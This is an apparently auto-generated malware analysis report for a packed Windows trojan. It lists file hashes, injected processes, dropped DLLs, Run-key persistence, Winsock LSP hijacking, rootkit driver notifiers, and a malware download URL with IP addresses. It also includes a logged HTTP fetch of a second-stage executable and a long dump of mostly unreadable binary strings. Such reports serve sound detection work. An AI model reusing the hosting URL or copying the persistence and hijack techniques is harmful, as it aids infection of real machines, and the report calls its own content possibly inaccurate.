Gen.Trojan.Heur.RP.FWaadPfKpj_67f845b640

by malwarelabrobot on January 19th, 2017 in Malware Descriptions.

Gen:Trojan.Heur.RP.@FW@aadPfKpj (B) (Emsisoft), Gen:Trojan.Heur.RP.@FW@aadPfKpj (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 67f845b6404d088455a9baa5c2d9ec9e
SHA1: 9169a915bd58533472233cdcb3993dcfb61dc54f
SHA256: ec7db15e88545465e16da54978dae8257fe8f191794ae3ee9f2d45100726dc05
SSDeep: 98304:PmXu3VSiI1ssZu5zujFdBvgggd5ZPlbRXjnbek8:OeF3WDBvYd5RFRXTb6
Size: 5017088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2017-01-03 15:06:51
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

winnet.exe:1248
Intel.exe:1900

The Trojan injects its code into the following process(es):

%original file name%.exe:2956
Reality.log:1796
pack11.exe:3608

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.sys (20 bytes)
C:\Windows\winnet.dll (124 bytes)
C:\Windows\winnet.exe (70 bytes)
C:\Windows\System32\config\SYSTEM.LOG1 (7918 bytes)
C:\$Directory (2304 bytes)
C:\Windows\System32\config\SYSTEM (5748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.exe (127 bytes)

The process pack11.exe:3608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process winnet.exe:1248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\winnet.dll (126 bytes)
C:\Windows\LSP.dll (88 bytes)

The process Intel.exe:1900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pack11.exe (7427 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\pack11[1].exe (6835 bytes)

Registry activity

The process %original file name%.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\Intel\Instances\Intel Instance]
"Flags" = "0"

[HKLM\System\CurrentControlSet\services\Intel\Instances]
"DefaultInstance" = "Intel Instance"

[HKLM\System\CurrentControlSet\services\Intel\Instances\Intel Instance]
"Altitude" = "370033"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process winnet.exe:1248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000022]
"ProtocolName" = "LR_LSP"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"ProtocolName" = "@%SystemRoot%\System32\wshtcpip.dll,-60101"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-100"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000024]
"ProtocolName" = "LR_LSP"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000024]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 4C 53 50 2E 64"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-101"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1124"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-103"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{BDC8D276-A5D8-4E4C-8EB2-2752A8E55337}] SEQPACKET 2"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000023]
"ProtocolName" = "LR_LSP"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Num_Catalog_Entries" = "21"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"ProtocolName" = "@%SystemRoot%\System32\wship6.dll,-60100"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-102"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{03967CDD-F8BD-4AC9-8369-0D2BD8F246F5}] DATAGRAM 1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 4C 53 50 2E 64"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{03967CDD-F8BD-4AC9-8369-0D2BD8F246F5}] SEQPACKET 1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{FB1DE278-988C-428A-AF16-245107A1AA49}] DATAGRAM 3"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip_{03967CDD-F8BD-4AC9-8369-0D2BD8F246F5}] DATAGRAM 0"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
"ProtocolName" = "LR_LSP"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000020]
"ProtocolName" = "VMCI sockets STREAM"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Serial_Access_Num" = "43"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000019]
"ProtocolName" = "VMCI sockets DGRAM"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{BDC8D276-A5D8-4E4C-8EB2-2752A8E55337}] DATAGRAM 2"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000020]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000019]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000023]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 4C 53 50 2E 64"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"ProtocolName" = "@%SystemRoot%\System32\wshtcpip.dll,-60102"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip6_{FB1DE278-988C-428A-AF16-245107A1AA49}] SEQPACKET 3"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"ProtocolName" = "MSAFD NetBIOS [\Device\NetBT_Tcpip_{03967CDD-F8BD-4AC9-8369-0D2BD8F246F5}] SEQPACKET 0"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"ProtocolName" = "@%SystemRoot%\System32\wship6.dll,-60101"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000022]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 4C 53 50 2E 64"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"ProtocolName" = "@%SystemRoot%\System32\wshtcpip.dll,-60100"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"ProtocolName" = "@%SystemRoot%\System32\wship6.dll,-60102"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000024]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000023]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000019]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000022]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
[HKLM\System\CurrentControlSet\services\WinSock2\Parameters\Protocol_Catalog9\0000002C]
[HKLM\System\CurrentControlSet\services\WinSock2\Parameters\Protocol_Catalog9\0000002B]
[HKLM\System\CurrentControlSet\services\WinSock2\Parameters\Protocol_Catalog9\0000002A]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000020]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]

The process Intel.exe:1900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Intel_RASMANCS]
"EnableConsoleTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"INTEL" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
03743259b426d308769257cb9ed9e93f c:\Windows\LSP.dll
c0cef56783f492e1e9f29a6f15848b74 c:\Windows\winnet.dll
7c184ba0b79448b278caef6895ac6cf4 c:\Windows\winnet.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Intel.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 34759 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 40960 10454 0 0 d41d8cd98f00b204e9800998ecf8427e
.data 53248 12268 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp0 65536 5256863 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp1 5324800 4729192 4729344 5.38718 4fb51347839a3806d70ae489fa68c00b
.reloc 10055680 244 512 2.07686 2f5a7d0f98be02539885a12becc5f6db
.rsrc 10059776 286205 286208 1.886 5365c5f5ef46ff9112f3b8db23e27491

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.dresou.net/pack11.exe 47.90.18.203
www.wdcrf.net 43.241.50.128


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS Possible Malicious Macro EXE DL AlphaNumL
ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /pack11.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.dresou.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 42496
Content-Type: application/octet-stream
Last-Modified: Tue, 06 Dec 2016 06:37:42 GMT
Accept-Ranges: bytes
ETag: "07fcf3e8b4fd21:6ab"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 18 Jan 2017 05:33:58 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......)...............(.......................-.....................Ri
ch....................PE..L...N..W............................p:......
.@....@..........................P............@.......................
...........B.......@.......................C..........................
............4<..H...........................................UPX0...
.................................UPX1................................@
....rsrc........@......................@..............................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..........3.91.UPX!....r&.\...1....o.......&..{....U.....SV.5....... .
3.W..3..]..........|#.F....@.....4.......m{..Q..U....Hu..'..~.........
....E.......t.....................I._..^..[..]..........o...Ut-.......
........HTTP/1.1 200 OK..Content-Length: 42496..Content-Type: applicat
ion/octet-stream..Last-Modified: Tue, 06 Dec 2016 06:37:42 GMT..Accept
-Ranges: bytes..ETag: "07fcf3e8b4fd21:6ab"..Server: Microsoft-IIS/6.0.
.X-Powered-By: ASP.NET..Date: Wed, 18 Jan 2017 05:33:58 GMT..MZ.......
...............@...............................................!..
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_2956:

.text
`.rdata
@.data
.vmp0
.vmp1
.reloc
@.rsrc
GetProcessWindowStation
Reality.log
D:\chengzhen\DNF\StartGame\Release\StartGame.pdb
C:\OneRun.txt
360tcpview
365tcpview
cports
tcpview
c:\%original file name%.exe
zr_]UbN
.xV``
.YB}n=
.uBs{(JBq
&.uFi
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
operator
activation.php?code=
deactivation.php?hash=
y2.eu:
.?AVIUrlBuilderSource@@
` Bb]%X
.Ujb!7l$_s
.jbBA
uDp'\T?UT6
^U.Qf
/.XZViC
"%1zqQ.Rog$
YQ.EM6
$[.zZ9)~M
-%fT\;Q
L.rg-
%F/.0
(nF%sr5-
Y<ÚK
.ToDLCF
Q.EMN
-r.arz%l\
".qZE=
_DsSH[Tq
M:.yjJu|h# 
\TCpAIN
v.uYQ2Ls
VeRr%3x 
.utDd'3|
m&y.Wh{(
7h}%f
".qPd
.Wh2N
xX_C~^%xtC
Ni%f*
.uJjQ?p8_
.so$:evV=
&.yxHh7
xOKCXQai.EMf
MfY2M2.af
Ee.cS[4'
r.uYQ>
$kdDw#hp .hJ
5va.Ire&YF
).yb-~
5NCsSH
-b}u6
&.YqLl 
]:.aq2
".yU~F
6 ]em.Poh
kc(>m&.UT
n.yU]"
.ek4'/`x
.YJIZ-
.qbj)
c.zrA
V^%dT\C
!~Q.IreFg(
0OZjb=
(c.zrE
>U!-b}6u
(oe2.yTp?
}.yb-{
^.px3
<c.zZa2:e
_@.qe
'gi.de
z-b}u
Mf:m%fz%
i.EMV
e.EeF
wPAE%uz
V^Ð
HkXPCNZ5&.UTdl
n%Ux 
Jm%f| 
8"th/%fn
&.yxH@_3Lck<3l
C8 s)z.yi6"e
`em.DE'
X !j~_:
J%Dpx
L^.px
.MEnc7?|
.AVme&k?
via:.yoD
 dt#4<[.zrA
.Yn_W0
4[.zr
-BP2}6
V^Ð8O>2
.zZE< w
0/'l=ia.Ee*`
.yFf=`?
M2.aL@W
%fOk,WX
-Mm}u
)r-%f
Rr_]Ufk?
]2.qa"
.yb1bA
uQ.IBUB]V
`a%fh3_-
%7U}u2
QY.Ee6
|?p{(M:.eb
".qPL3l
/.XT?
W8.anNa
dUI6i.aB
-2}JjE-^qQZ
n^V-%fp,
rs/.yM
.meF$
{.IY(ssp
.iw(W_0;3PCL
f!V^%dT\W
ck4g(s0U.aF
)gQ^TcPp f2:Q
}.yb-V=
&.iw(v
%fyq&Y
9RM6a.Ify
.iPdC
.zr-ZR]
.YBYbU
&.im%
Kd_Lq.OTo$
}.un1z=
.ie_Z
&.YDHoWa
m&.wJ
.XT7?P
%FY:s
}.qy&4gZ
vj=w
P<.leTI_-
C".qPd7
S@.iq
&e.EM>s'
.eixn
~„c_
u.ybY
bZ5Oy&b%dH{m
e.anf9x,$
UT".iRAL
kGp/.XT[ 
h`7r&.ir
j$=z.ue:
.iPdO
.iNEj)
V^%dT\ @`G
S-j}]2wGg,
CZ.pPS/
Z5%fH
.iD`W
.evV=
.TS\E
uAz.qbjU
(m4.TA
".ab9)f
.uFukjg
071=^6<7<
QT".qe
nfÐ
FfÐ
2.eA{'nS
=r.iPdC
.Yj)R5
cU.Ee
5z.qa
%DL;gZ
e2.qa"
7l?h[Hm.aN
c'TCpx
NJ= \Ÿ
kKpy-%f
}Y.aR
&.iw<
&.uJjA
%fqQf<s/
kV|9.tPG
Wd<o%ft'
Q:d~ykc@.YfFU}
pP7r&.iq
sSHW<
S[0y-%f[GD
/\-yY.de
"U].UdDG
%F}uB
-ytu}
'|sSHr%
9b".aJIZE~
d.NeRr9
aEr.uc4
H^.px
^5-j}
"U.bQ
}V^%dTtC
.Tp';
>6UbSsH
V-&.irz-"u
.IqC~
.ab9p@H?."}
-G.RU
}.ybM
BJU\lLC".qy*
}.qy&4gNjE
g~v%dT
.qD`/?
q.uTK
U:v.Mai
i2.eu>
!;m.GKR
h.jls
.hsPb3
.hsPf5a
.hC:f
_qf%xrb
|e.eZ*
Js%sX
.odTa
.HA; 
`h%fp
.oVSa
d1.Zf.
nB.MCU
.UC\&
&.Zf*L
|e.uE
%SqM:2
.VRKHV=
V|"'mOusSh
4 `h%fp
|^.dd
.Nn59
{.UFt
-l%d)
.IC\&
.zq)y6
B;3%x
bBE.rcD
.FM\m
.g(%d,dc
s9G.lB,
uudPC
Kqñ*
>-%x(
.gJw/
\.vN%
.YRKBf
H%U|[
H%Us[
).JS3
'%X~&
/.DTa
8U.VBF
z31 e.VB
L.za=
.Aye?$
.DFIM
}-Sh}m
JFtp
$]%D#X
|e.VR
!C.YB
dR.XE
I!K.bB
JP%d,
Q%c:x
;lz%u
vrý
trK%U
ryf=.wKH?
s-E}.
nd.va
5<.tj
Q/}
.U%D$9
.Zl@ h;
BZ.ti
DD.ZZ
pj.YK&
 *%sVO6
J.Bx=
`%s},
.GDZe
.Bg=I
3@F%x
F.uljH
w.LXVL
oC%d@
).cuP
3.vUu
>Z.Dq
.MDRw
{?a%u_
K\X.emh
2^:_56!5
%X#X2Vy8h
yFTP
/.Lec
wW%sw8;x$
.lcHp
X\%dZ
t%fnL
dessH
(1.Wl:
`.pLv
}gq%Xp
h\1(.zU
I`.PkG
%X@X!(j
%u6mO.
H\.kH@
TH 9EXe
.MvV`
UXY.uE
.ly1z
%c!OA
JExE
.GXoj
Dg.pL
x_.Xw
.Cxs#
c4.XC
.UE%3
H.Ib*OE
s.Qa4KG
*0%UtR
d\).zO
@%fpL1
F24

.SLOL
%Sk%6
%4.d{
Cz:%C
*M.QS~
%Fu^gw
%XSP}
>ge.DM
x*O2%U
-3}xH
u7H%S
c%x0.
~d.hz
RL
G,Y%U
M.hzc
.CL",
.Any1V
bB$,F
.DBE:
%u@-N
fJi.FH
.Hy6e
8Tt%u)
.MU_(
[{%fH#d
r4)%UG
.lD?g3w
#(.HS
tweb
.mQH5
.yi,Q
U%c*P
Z/.kY]
wBZ.cw
K%U=-
.BU{,i
a=%do5
Wpmsg
(.une`
H%U-=
wBZ.cs
6J<.GWy
wBZ.wJ
.UMTa
UgO.eQ
%Dk*qH
1%XWw
99.%F
.uk@B
AjT%s
5>%F"2
ftPy
=X-Q}
eG.uN
.QU=~
W`~%xx
ÞJ6
4n!.kT "
T%S0F?V
pI%SmJ*^
%Ubq%
X%Djy[
=.ptS
#&.ns
.XMTa
.Nr_d
o.PVX
,p3%x
d%s15(
.zVZ?
G.dV'
QweB0
d=cüi
g|%Cv
=.aG)c
iSTZ%u
8 IK3%d
#%fW[iG
T{%S8
M:.hP
W$.wI/i
AA.pV
jZ.znI
%D-m=
Zg-A}
}*r%d/
.>t%f(
d.ck3p
.Ej#6`
